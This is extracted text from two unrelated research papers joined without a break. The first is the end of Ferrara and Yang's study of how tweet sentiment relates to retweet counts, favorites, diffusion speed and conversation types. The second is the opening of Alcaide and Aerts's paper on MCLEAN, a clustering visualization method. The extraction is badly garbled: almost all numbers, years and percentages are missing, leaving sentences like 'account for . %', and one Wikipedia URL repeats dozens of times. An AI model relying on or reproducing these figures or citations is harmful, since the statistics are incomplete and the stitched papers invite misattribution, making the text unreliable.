we identify three classes of tweets’ sentiment: negative (polarity score s ≤ − ), neutral (s = ), and positive (s ≥ ). negative, neutral, and positive tweets account for, respectively, . %, . % and . % of the total. the distribution of polarity scores is captured by fig. : we can see it is peaked around neutral tweets, accounting for over two-fifths of the total, while overall the distribution is ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure distribution of polarity scores computed for our dataset. the polarity score s is the dif- ference between positive and negative sentiment scores as calculated by sentistrength. the dataset (n = , , tweets, by m = , , different users) contains . % of neutral (s = ), . % of positive (s ≥ ), and . % of negative (s ≤ − ) tweets, respectively. slightly skewed toward positiveness. we can also observe that extreme values of positive and negative tweets are comparably represented: for example, there are slightly above thousand tweets with polarity score s = + , and about thousands with opposite polarity of s = − . results the role of sentiment on information diffusion here we are concerned with studying the relation between content sentiment and information diffusion. figure shows the effect of content sentiment on the information diffusion dynamics and on content popularity. we measure three aspects of information diffusion, as function of tweets polarity scores: fig. a shows the average number of retweets collected by the original posts as function of the polarity expressed therein; similarly, fig. b shows the average number of times the original tweet has been favorited; fig. c illustrates the speed of information diffusion, as reflected by the average number of seconds that occur between the original tweet and the first retweet. both figs. a and c focus only on tweets that have been retweeted at least once. figure b considers only tweets that have been favorited at least once. note that a large fraction of tweets are never retweeted ( . % in our dataset) or favorited ( . %): fig. a is based on the , , tweets that have been retweeted at least once (rt ≥ ), fig. b reports on the , , tweets that have favorited at least once, and fig. c is comprised of the , , tweets for which we have observed the first retweet in our dataset (so that we can compute the time between the original tweet and the first retweet). note that the retweet count is extracted from the tweet metadata, instead of being calculated as the number of times we observe a retweet of each tweet in our dataset, in order to avoid the bias due to the sampling rate of the twitter gardenhose. for this reason, the average number of retweets reported in ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the effect of sentiment on information diffusion. (a) the average number of retweets, (b) the average number of favorites, and (c) the average number of seconds passed before the first retweet, as a function of the polarity score of the given tweet. the number on the points represent the amount of tweets with such polarity score in our sample. bars represent standard errors. fig. a seems pretty high (above for all classes of polarity scores): by capturing the “true” number of retweets we well reflect the known broad distributions of content popularity of social media, skewing the values of the means toward larger figures. 
the very same reasoning applies for the number of favorites. due to the high skewness of the distributions of number of retweets, number of favorites, and time before first retweet, we performed the same analysis as above on median values rather than averages. the same trends hold true: particularly interesting, average and median seconds before the first retweet are substantially identical. the results for the average and median number of retweets and favorites are also comparable, factoring out some small fluctuations. two important considerations emerge from the analysis of fig. : (i) positive tweets spread broader than neutral ones, and collect more favorites, but interestingly negative posts do not spread any more or less than neutral ones, neither get more or less favorited. this suggests the hypothesis of observing the presence of positivity bias (garcia, garas & schweitzer, ) (or pollyanna hypothesis (boucher & osgood, )), that is the tendency of individuals to favor positive rather than neutral or negative items, and choose what information to favor or rebroadcast further accordingly to this bias. (ii) negative content spread much faster than positive ones, albeit not significantly faster than neutral ones. this suggests that positive tweets require more time to be rebroadcasted, while negative or neutral posts generally achieve their first retweet twice as fast. interestingly, previous studies on information cascades showed that all retweets after the first take increasingly less time, which means that popular content benefit from a feedback loop that speeds up the diffusion more and more as a consequence of the increasing popularity (kwak et al., ). conversations’ dynamics and sentiment evolution to investigate how sentiment correlates with content popularity, we now only consider active and exclusive discussions occurred on twitter in september . each topic of discussion is here identified by its most common hashtag. active discussions are defined as those with more than tweets (in our dataset, which is roughly a % sample of the ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure dynamical classes of popularity capturing four different types of twitter conversa- tions. (a) shows the gaussian mixture model employed to discover the four classes. the y and x axes represent, respectively, the proportion of tweets occurring before and after the peak of popularity of a given discussion. different colors represent different classes: anticipatory discussions (blue dots), unexpected events (green), symmetric discussions (red), transient events (black). (b) shows the bic scores of different number of mixture components for the gmm (the lower the bic the better the gmm captures the data). the star identifies the optimal number of mixtures, four, best captured by the full model. public tweets), and exclusive ones are defined as those whose hashtag never appeared in the previous (august ) and the next (october ) month. inspired by previous studies that aimed at finding how many types of different conversations occur on twitter (kwak et al., ; lehmann et al., ), we characterize our discussions according to three features: the proportion pb of tweets produced within the conversation before its peak, the proportion pd of tweets produced during the peak, and finally the proportion pa of tweets produced after the peak. 
the peak of popularity of the conversation is simply the day which exhibits the maximum number of tweets with that given hashtag. we use the expectation maximization (em) algorithm to learn an optimal gaussian mixture model (gmm) in the (pb,pa) space. to determine the appropriate number of components (i.e., the number of types of conversations), we adopt three gmm models (spherical, diagonal, and full) and perform a -fold cross-validation using the bayesian information criterion (bic) as quality measure. we vary the number of components from to . figure b shows the bic scores for different number of mixtures: the lower the bic score, the better. the outcome of this process determines that the optimal number of components is four, in agreement with previous studies (lehmann et al., ), as captured the best by the full gmm model. in fig. a we show the optimal ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure example of four types of twitter conversations reflecting the respective dynamical classes in our dataset. (a) shows one example of anticipatory discussion (#tennvsou); (b) an unexpected event (#mileypor principales); (c) a symmetric discussion (#prayforrise); and (d) a transient event (#kdwbmeeted). gmm that identifies the four classes of conversation: the two dimensions represent the proportion pb of tweets occurring before (y axis) and pa after (x axis) the peak of popularity of each conversation. the four classes correspond to: (i) anticipatory discussions (blue dots), (ii) unexpected events (green), (iii) symmetric discussions (red), and (iv) transient events (black). antici- patory conversations (blue) exhibit most of the activity before and during the peak. these discussions build up over time registering an anticipatory behavior of the audience, and quickly fade out after the peak. the complementary behavior is exhibited by discussions around unexpected events (green dots): the peak is reached suddenly as a reaction to some exogenous event, and the discussion quickly decays afterwards. symmetric discussions (red dots) are characterized by a balanced number of tweets produced before, during, and after the peak time. finally, transient discussions (black dots) are typically bursty but short events that gather a lot of attention, yet immediately phase away afterwards. according to this classification, out of , active and exclusive conversations (hashtags) observed in september , we obtained hashtags of class a (anticipatory), of class b (unexpected), of class c (symmetric), and , of class d (transient), respectively. figure shows examples representing the four dynamical classes of conversations registered in our dataset. the conversation lengths are all set to days, and centered at the peak day (time window ). ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a represents an example of anticipatory discussion: the event captured (#ten- nvsou) is the football game tennessee volunteers vs. oklahoma sooners of sept. , . the anticipatory nature of the discussion is captured by the increasing amount of tweets generated before the peak (time window ) and by the drastic drop afterwards. figure b shows an example (#mileypor principales) of discussion around an unexpected event, namely the release by los principales of an exclusive interview to miley cyrus, on sept. , . 
there is no activity before the peak point, that is reached immediately the day of the news release, and after that the volume of discussion decreases rapidly. figure c represents the discussion of a symmetric event: #prayforrise was a hashtag adopted to support rise, the singer of the k-pop band ladies’ code, who was involved in a car accident that eventually caused her death. the symmetric activity of the discussion perfectly reflects the events : the discussion starts the day of the accident, on september , , and peaks wikipedia: ladies’ code— http://en. wikipedia.org/wiki/ladies% code. the day of rise’s death (after four days from the accident, on september , ), but the fans’ conversation stays alive to commemorate her for several days afterwards. lastly, fig. d shows one example (#kdwbmeeted) of transient event, namely the radio station kdwb announcing a lottery drawing of the tickets for ed sheeran’s concert, on sept. , . the hype is momentarily and the discussion fades away immediately after the lottery is concluded. figure shows the evolution of sentiment for the four classes of twitter conversations: it can be useful to remind the average proportions of neutral ( . %), positive ( . %), and negative ( . %) sentiments in our dataset, to compare them against the distributions for popular discussions. also worth noting, although each discussion is hard-cast in a class (anticipatory, unexpected, symmetric, or transient), sometimes spurious content might appear before or after the peak, causing the presence of some small amount of tweets where ideally we would not expect any (for example, some tweets appear after the peak of an anticipatory discussion). we grayed out the bars in figs. a, b and d, to represent non-significant amounts of tweets that are present only as byproduct of averaging across all conversations belonging to each specific class. these intervals therefore do not convey any statistically significant information and are disregarded. (a) for anticipatory events, the amount of positive sentiment grows steadily until the peak time, while the negative sentiment is somewhat constant throughout the entire anticipatory phase. notably, the amount of negative content is much below the dataset average, fluctuating between % and % (almost half of the dataset average), while the positive content is well above average, ranging between % and %. this suggests that, in general, anticipatory popular conversations are emotionally positive. (b) the class of unexpected events intuitively carries more negative sentiment, that stays constant throughout the entire discussion period to levels of the dataset average. (c) symmetric popular discussions are characterized by a steadily decreasing negative emotions, that goes from about % (above dataset’s average) at the inception of the discussions, to around % toward the end of the conversations. complementary behavior happens for positive emotions, that start around % (equal to the dataset average) and steadily grow up to % toward the end. this suggests that in symmetric conversations there is a general ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com/computer-science/ http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://en.wikipedia.org/wiki/ladies% _code http://dx.doi.org/ . /peerj-cs. figure evolution of positive and negative sentiment for different types of twitter conversations. the four panels show the average distribution of tweet proportion, and the average positive (s ≥ ) and negative (s ≤ − ) tweet proportions, for the four classes respectively: (a) anticipatory discussion; (b) unexpected event; (c) symmetric discussion; and, (d) transient discussion. shift of emotions toward positiveness over time. (d) finally, transient events, due to their short-lived lengths, represent more the average discussions, although they exhibit lower levels of negative sentiments (around %) and higher levels of positive ones (around %) with respect to the dataset’s averages. discussion the ability to computationally annotate at scale the emotional value of short pieces of text, like tweets, allowed us to investigate the role that emotions and sentiment expressed into social media content plays with respect to the diffusion of such information. our first finding in this study sheds light on how sentiment correlates with the speed and the reach of the diffusion process: tweets with negative emotional valence spread faster than neutral and positive ones. in particular, the time that passes between the publication of the original post and the first retweet is almost twice as much, on average, for positive tweets than for negative ones. 
this might be interpreted in a number of ways, the most likely being that content that conveys negative sentiments trigger stronger reactions in the readers, some of which might be more prone to share that piece of information with higher chance than any neutral or positive content. however, the positivity bias (or pollyanna effect) (garcia, garas & schweitzer, ; boucher & osgood, ) rapidly kicks in when ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we analyze how many times the tweets become retweeted or favorited: individuals online clearly tend to prefer positive tweets, which are favorited as much as five times more than negative or neutral ones; the same holds true for the amount of retweets collected by positive posts, which is up to . times more than negative or neutral ones. these insights provide some clear directives in terms of best practices to produce popular content: if one aims at triggering a quick reaction, negative sentiments outperform neutral or positive emotions. this is the reason why, for example, in cases of emergencies and disasters, misinformation and fear spread so fast in online environments (ferrara et al., ). however, if one aims at long-lasting diffusion, then positive content ensures wide reach and the most preferences. the second part of our study focuses on entire conversations, and investigates how different sentiment patterns emerge from discussions characterized by different temporal signatures (kwak et al., ; lehmann et al., ): we discover that, in general, highly-anticipated events are characterized by positive sentiment, while unexpected events are often harbingers of negative emotions; yet, transient events, whose duration is very brief, represent the norm on social media like twitter and are not characterized by any particular emotional valence. these results might sound unsurprising, yet they have not been observed before: common sense would suggest, for example, that unprecedented conversations often relate to unexpected events, such as disasters, emergencies, etc., that canalize vast negative emotions from the audience, including fear, sorrow, grief, etc. (sakaki, okazaki & matsuo, ). anticipated conversations instead characterize events that will occur in the foreseeable future, such as a political election, a sport match, a movie release, an entertainment event, or a recurring festivity: such events are generally positively received, yet the attention toward them quickly phases out after their happening (lehmann et al., ; mestyán, yasseri & kertész, ; le, ferrara & flammini, ). elections and sport events might represent special cases, as they might open up room for debate, “flames”, polarized opinions, etc. (ratkiewicz et al., ; bond et al., ) (such characteristics have indeed been exploited to make predictions (asur & huberman, ; metaxas & mustafaraj, ; le, ferrara & flammini, )). the findings of this paper have very practical consequences that are relevant both for economic and social impact: understanding the dynamics of information diffusion and the effect of sentiment on such phenomena becomes crucial if one, for example, wants to craft a policy to effectively communicate with an audience. the applications range from advertisement and marketing, to public policy and emergency management. 
recent events, going for tragic episodes of terrorism, to the emergence of pandemics like ebola, have highlighted once again how central social media are in the timely diffusion of information, yet how dangerous they can be when they are abused or misused to spread misinformation or fear. our contribution pushes forward previous studies on sentiment and information diffusion (dang-xuan & stieglitz, ) and furthers our understanding of how the emotions expressed in a short piece of text might correlated with its spreading in online social ecosystems, helping to craft effective information diffusion strategies that account for the emotional valence of the content. ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. acknowledgements ef is grateful to filippo menczer, yy ahn, sune lehmann, and johan bollen for interesting discussions, and to alessandro flammini and lorenzo coviello for their precious feedback on the project and extensive comments on the manuscript. additional information and declarations funding ef was partly supported by onr grant no. n a- - . zy was partly supported by nsf grant no. iis- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: onr: n a- - . nsf: iis- . competing interests the authors declare there are no competing interests. author contributions • emilio ferrara conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • zeyao yang performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work. data availability the following information was supplied regarding data availability: data was collected through the public twitter api (https://dev.twitter.com/overview/ api). to comply with twitter terms of service, data cannot be publicly shared. interested future researchers may reproduce the experiments by following the procedure described in the paper. anonymized data may be available upon request from dr. emilio ferrara (ferrarae@isi.edu). references akkaya c, wiebe j, mihalcea r. . subjectivity word sense disambiguation. in: proceedings of the conference on empirical methods in natural language processing. acl, – . anderson a, huttenlocher d, kleinberg j, leskovec j. . effects of user similarity in social media. in: proceedings of the fifth acm international conference on web search and data mining. acm, – . ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. 
aral s, muchnik l, sundararajan a. . distinguishing influence-based contagion from homophily-driven diffusion in dynamic networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . aral s, walker d. . identifying influential and susceptible members of social networks. science ( ): – doi . /science. . asur s, huberman ba. . predicting the future with social media. in: ieee/wic/acm international conference on web intelligence and intelligent agent technology. ieee, – . backstrom l, kleinberg j. . romantic partnerships and the dispersion of social ties: a network analysis of relationship status on facebook. in: proceedings of the th acm conference on computer supported cooperative work & social computing. acm, – . bakshy e, rosenn i, marlow c, adamic l. . the role of social networks in information diffusion. in: proceedings of the st international conference on world wide web, – . bayer m, sommer w, schacht a. . font size matters—emotion and attention in cortical responses to written words. plos one ( ):e doi . /journal.pone. . beasley a, mason w. . emotional states vs. emotional words in social media. in: acm conference on web science. acm. berger j. . arousal increases social transmission of information. psychological science ( ): – doi . / . berger j, milkman kl. . what makes online content viral? journal of marketing research ( ): – doi . /jmr. . . bollen j, mao h, pepe a. . modeling public mood and emotion: twitter sentiment and socio-economic phenomena. in: international aaai conference on weblogs and social media. aaai, – . bollen j, mao h, zeng x. . twitter mood predicts the stock market. journal of computational science ( ): – doi . /j.jocs. . . .
bond rm, fariss cj, jones jj, kramer ad, marlow c, settle je, fowler jh. . a -million-person experiment in social influence and political mobilization. nature ( ): – doi . /nature . boucher j, osgood ce. . the pollyanna hypothesis. journal of verbal learning and verbal behavior ( ): – doi . /s - ( ) - . centola d. . the spread of behavior in an online social network experiment. science ( ): – doi . /science. . centola d. . an experimental study of homophily in the adoption of health behavior. science ( ): – doi . /science. . cheng j, adamic l, dow pa, kleinberg jm, leskovec j. . can cascades be predicted? in: pro- ceedings of the rd international conference on world wide web, – . choudhury md, counts s, gamon m. . not all moods are created equal! exploring human emotional states in social media. in: international aaai conference on weblogs and social media, – . conover md, davis c, ferrara e, mckelvey k, menczer f, flammini a. a. the geospatial characteristics of a social movement communication network. plos one ( ):e doi . /journal.pone. . conover md, ferrara e, menczer f, flammini a. b. the digital evolution of occupy wall street. plos one ( ):e doi . /journal.pone. . ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /science. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / http://dx.doi.org/ . /jmr. . http://dx.doi.org/ . /j.jocs. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /science. http://dx.doi.org/ . /science. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. dang-xuan l, stieglitz s. . impact and diffusion of sentiment in political communication-an empirical analysis of political weblogs. in: international aaai conference on weblogs and social media. aaai, – . de meo p, ferrara e, fiumara g, provetti a. . on facebook, most ties are weak. communications of the acm ( ): – doi . / . ferrara e. . a large-scale community structure analysis in facebook. epj data science ( ): – doi . /epjds . ferrara e, jafariasbagh m, varol o, qazvinian v, menczer f, flammini a. a. clustering memes in social media. in: ieee/acm international conference on advances in social networks analysis and mining. ieee, – . ferrara e, varol o, davis c, menczer f, flammini a. . the rise of social bots. arxiv preprint. arxiv: . . ferrara e, varol o, menczer f, flammini a. b. traveling trends: social butterflies or frequent fliers? in: first acm conference on online social networks. acm, – . ferrara e, yang z. . measuring emotional contagion in social media. arxiv preprint. arxiv: . . garcia d, garas a, schweitzer f. . positive words carry less information than negative words. epj data science ( ): – doi . /epjds . gilbert e, karahalios k. . predicting tie strength with social media. in: th sigchi conference on human factors in computing systems. acm, – . golder sa, macy mw. . diurnal and seasonal mood vary with work, sleep, and daylength across diverse cultures. science ( ): – doi . /science. . gomez rodriguez m, leskovec j, schölkopf b. . structure and dynamics of information pathways in online media. in: proceedings of the sixth acm international conference on web search and data mining. acm, – . harris rb, paradice d. . an investigation of the computer-mediated communication of emotions. journal of applied sciences research ( ): – . huberman b, romero d, wu f. . 
social networks that matter: twitter under the microscope. first monday ( ) – . hutto c, gilbert e. . vader: a parsimonious rule-based model for sentiment analysis of social media text. in: international aaai conference on weblogs and social media, – . java a, song x, finin t, tseng b. . why we twitter: understanding microblogging usage and communities. in: workshop on web mining and social network analysis, – . kaplan am, haenlein m. . users of the world, unite! the challenges and opportunities of social media. business horizons ( ): – doi . /j.bushor. . . . kissler j, herbert c, peyk p, junghofer m. . buzzwords early cortical responses to emotional words during reading. psychological science ( ): – doi . /j. - . . .x. kramer ad, guillory je, hancock jt. . experimental evidence of massive-scale emotional contagion through social networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . kwak h, lee c, park h, moon s. . what is twitter, a social network or a news media? in: proceedings of the th international conference on world wide web. acm, – . lazer d, pentland as, adamic l, aral s, barabasi al, brewer d, christakis n, contractor n, fowler j, gutmann m, jebara t, king g, macy m, roy d, van alstyne m. . life in the network: the coming age of computational social science. science ( ): – doi . /science. . ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / http://dx.doi.org/ . /epjds http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /epjds http://dx.doi.org/ . /science. http://dx.doi.org/ . /j.bushor. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. le l, ferrara e, flammini a. . on predictability of rare events leveraging social media: a machine learning perspective. in: cosn’ : acm sgb conference on online social networks. acm. lehmann j, gonçalves b, ramasco jj, cattuto c. . dynamical classes of collective attention in twitter. in: proceedings of the st international conference on world wide web. acm, – . lerman k, ghosh r. . information contagion: an empirical study of the spread of news on digg and twitter social networks. in: international aaai conference on weblogs and social media, vol. , – . mei q, ling x, wondra m, su h, zhai c. . topic sentiment mixture: modeling facets and opinions in weblogs. in: proceedings of the th international conference on world wide web. acm, – . mestyán m, yasseri t, kertész j. . early prediction of movie box office success based on wikipedia activity big data. plos one ( ):e doi . /journal.pone. . metaxas pt, mustafaraj e. . social media and the elections. science ( ): – doi . /science. . myers sa, zhu c, leskovec j. . information diffusion and external influence in networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. acm, – . nagarajan m, purohit h, sheth ap. . a qualitative examination of topical tweet and retweet practices. in: international aaai conference on weblogs and social media, – . paltoglou g, thelwall m. . a study of information retrieval weighting schemes for sentiment analysis. in: proceedings of the th annual meeting of the association for computational linguistics. acl, – . pang b, lee l. . opinion mining and sentiment analysis. foundations and trends in information retrieval ( – ): – doi . / . 
ratkiewicz j, conover m, meiss m, gonçalves b, flammini a, menczer f. . detecting and tracking political abuse in social media. in: th international aaai conference on weblogs and social media, – . recuero r, araujo r, zago g. . how does social capital affect retweets? in: international aaai conference on weblogs and social media. sakaki t, okazaki m, matsuo y. . earthquake shakes twitter users: real-time event detection by social sensors. in: th international conference on world wide web, – . stieglitz s, dang-xuan l. . emotions and information diffusion in social media—sentiment of microblogs and sharing behavior. journal of management information systems ( ): – doi . /mis - . suh b, hong l, pirolli p, chi eh. . want to be retweeted? large scale analytics on factors impacting retweet in twitter network. in: ieee nd international conference on social computing. ieee, – . tang j, lou t, kleinberg j. . inferring social ties across heterogenous networks. in: proceedings of the fifth acm international conference on web search and data mining, – . thelwall m, buckley k, paltoglou g. . sentiment in twitter events. journal of the american society for information science and technology ( ): – doi . /asi. . thelwall m, buckley k, paltoglou g, cai d, kappas a. . sentiment strength detection in short informal text. journal of the american society for information science and technology ( ): – doi . /asi. . ugander j, backstrom l, marlow c, kleinberg j. . structural diversity in social contagion. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . varol o, ferrara e, ogan cl, menczer f, flammini a. . evolution of online user behavior during a social upheaval. in: acm conference on web science. acm, – . vespignani a. . predicting the behavior of techno-social systems. science ( ): – doi . /science. . weng l, menczer f, ahn y-y. . virality prediction and community structure in social networks. scientific reports . weng l, menczer f, ahn y-y. . predicting successful memes using network and community structure. in: th international aaai conference on weblogs and social media. article . submitted december accepted january published january corresponding author daniel alcaide, daniel.alcaide@kuleuven.be, daniel.alcaide@esat.kuleuven.be academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright alcaide and aerts distributed under creative commons cc-by .
open access mclean: multilevel clustering exploration as network daniel alcaide and jan aerts department of electrical engineering (esat) stadius center for dynamical systems, signal processing and data analytics, ku leuven, leuven, belgium imec, ku leuven, leuven, belgium abstract finding useful patterns in datasets has attracted considerable interest in the field of visual analytics. one of the most common tasks is the identification and representation of clusters. however, this is non-trivial in heterogeneous datasets since the data needs to be analyzed from different perspectives. indeed, highly variable patterns may mask underlying trends in the dataset. dendrograms are graphical representations resulting from agglomerative hierarchical clustering and provide a framework for viewing the clustering at different levels of detail. however, dendrograms become cluttered when the dataset gets large, and the single cut of the dendrogram to demarcate different clusters can be insufficient in heterogeneous datasets. in this work, we propose a visual analytics methodology called mclean that offers a general approach for guiding the user through the exploration and detection of clusters. powered by a graph- based transformation of the relational data, it supports a scalable environment for representation of heterogeneous datasets by changing the spatialization. we thereby combine multilevel representations of the clustered dataset with community finding algorithms. our approach entails displaying the results of the heuristics to users, providing a setting from which to start the exploration and data analysis. to evaluate our proposed approach, we conduct a qualitative user study, where participants are asked to explore a heterogeneous dataset, comparing the results obtained by mclean with the dendrogram. these qualitative results reveal that mclean is an effective way of aiding users in the detection of clusters in heterogeneous datasets. the proposed methodology is implemented in an r package available at https://bitbucket.org/vda-lab/mclean. subjects data science, visual analytics keywords exploratory data analysis, graph and network visualization, hierarchical clustering, visual analytics introduction determining the number of clusters in a dataset is a frequent problem in data clustering, and is a distinct matter from the algorithm of actually solving the clustering problem. the correct choice of the number of groups is often ambiguous depending on the shape and scale of the points in a dataset and the desired clustering resolution by the user. the optimal choice of clusters depends on the intended use, but in general, it strikes a balance between the maximum compression using a single cluster and the highest resolution of the data by assigning each data point to its own cluster. how to cite this article alcaide and aerts ( ), mclean: multilevel clustering exploration as network. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:daniel.alcaide@kuleuven.be mailto:daniel.alcaide@esat.kuleuven.be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://bitbucket.org/vda-lab/mclean http://dx.doi.org/ . /peerj-cs. several clustering algorithms have been proposed for partitioning datasets (jain, murty & flynn, ). 
most of these rely on parameter settings, such as the number of clusters in k-means, the reference value (ε) in dbscan or the cutoff distance in a hierarchical clustering. these parameters differ from the algorithm, but either directly or indirectly specify the number of clusters. setting these parameters demands either detailed pre- existing knowledge of the data or time-consuming trial and error. moreover, a singular cutoff can hide interesting underlying structures. in the real world, there might not be an single sensible cutoff, and it is common that automatic clustering methodologies ignore particular characteristics of clusters, as some of these might be for example particularly dense or sparse. as boudjeloud-assala et al. ( ) state, ‘‘the clustering process is not complete until it is evaluated, validated, and accepted by the user. as such, visual validation and exploration can improve understanding of clustering structure, and can be very effective in revealing trends, highlighting outliers, and showing clusters’’. visualizing clustering results can help to quickly assimilate the information and provide insights that support and complement textual outputs or statistical summaries. typical questions to be answered regarding clustering results include how well defined the clusters are, how far away they are from each other, what their size is, and if the observations belong strongly to the cluster or only marginally. therefore the exploration of the different cluster scenarios and the identification of similar record groups (i.e., patterns) in the dataset is a challenge for the user (vogogias et al., ). hierarchical clustering is a widely used and effective algorithm to answer these questions, as it provides a framework for viewing the clustering at different levels of detail by imposing a hierarchy on it using a tree (friedman, hastie & tibshirani, ). during the cutoff selection process of the tree, the analyst can instantly obtain insights from the graphical representation that suggest the adequacy of the solution but hierarchical clustering does have some drawbacks: ( ) the dendrogram representation becomes cluttered when datasets get large; ( ) a single cut of the dendrogram is sufficient when the dataset is homogeneous. however, when the dataset is heterogeneous, multiple cuts at different levels might be required. ( ) if patterns are present at different levels, choosing a cutoff will hide all but one of these. clustering methods often are a fixed process: loading a dataset, setting parameters, running the algorithm, and plotting the results. in other words: clustering is used generally to analyze the data, not to explore it (boudjeloud-assala et al., ). the integration of visualization and algorithm into the same model is a possible solution to make the clustering process dynamic. the framework to perform interactive visual clustering (ivc) presented by boudjeloud-assala et al. ( ) demonstrated a significant advantage in data mining since it allows users to participate in the clustering process by leveraging their visual perception and domain knowledge. as recommended by keim, mansmann & thomas ( ), we believe that if we adapt the visualization environment and combine it with the clustering approach, this combined approach can be used to provide a very natural way for users to explore datasets. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
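the sensitivity to that single cutoff is easy to demonstrate: cutting the same single-linkage dendrogram at different heights yields different partitions of the same data. the following sketch uses scipy on toy data purely to illustrate this point; it is not part of the mclean package itself.

```python
# one hierarchy, several cut heights, several different partitions (toy illustration)
import numpy as np
from scipy.cluster.hierarchy import linkage, fcluster

rng = np.random.default_rng(0)
# three loose 2-d blobs
x = np.vstack([rng.normal(loc, 0.3, size=(30, 2)) for loc in (0.0, 3.0, 6.0)])

z = linkage(x, method="single")          # single-linkage hierarchy
for cut in (0.5, 1.5, 4.0):              # candidate cutoff distances
    labels = fcluster(z, t=cut, criterion="distance")
    print(f"cut at {cut}: {labels.max()} clusters")
```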
we suggest a novel and generic clustering and exploration approach called mclean (multilevel clustering exploration as network) for grouping and visualizing multiple granularities of the data that enables: ( ) exploration of the dataset using a overview- plus-detail representation, ( ) simplification of the dataset using aggregation based on the similarity of data elements, ( ) detection of substructures by means of community detection algorithms, and ( ) inclusion of the human in the process of selection the number of clusters. our methodology follows a synergistic approach that combines the strengths of connectivity-based algorithms, community detections techniques and the ability of humans to visually detect patterns, to explore moderately large datasets. it is a visual exploratory and clustering method that permits the user to interact with the algorithm results. the method combines hierarchical clustering algorithms with interactive tools to find optimal clusters and visualize them in a simplified network representation. network visualizations are an effective means to understand the patterns of interaction between entities, to discover entities with interesting roles, and to identify inherent groups or clusters of entities (liu, navathe & stasko, ). the mclean methodology is implemented in an r package available at https://bitbucket.org/vda-lab/mclean. the remaining part of this paper is organized as follows. in the section ‘background’ we give an overview of related work in multilevel clustering and graph visualization techniques as an exploratory tool. the section ‘methods’ describes the proposed visualization technique for clustering exploration in detail, followed by the section ‘evaluation’, in which we present an evaluation of our approach. finally, the section ‘conclusions and future work’ presents conclusions and possible directions for future work. background the proposed framework allows the user to employ tacit knowledge in the clustering process in order to detect substructures. this process provides a multilevel environment through overview-plus-detail offering both a general outlook of the data grouping and the precise union of a subset of elements using graphs. to set our work in context, we present a set of examples of visual 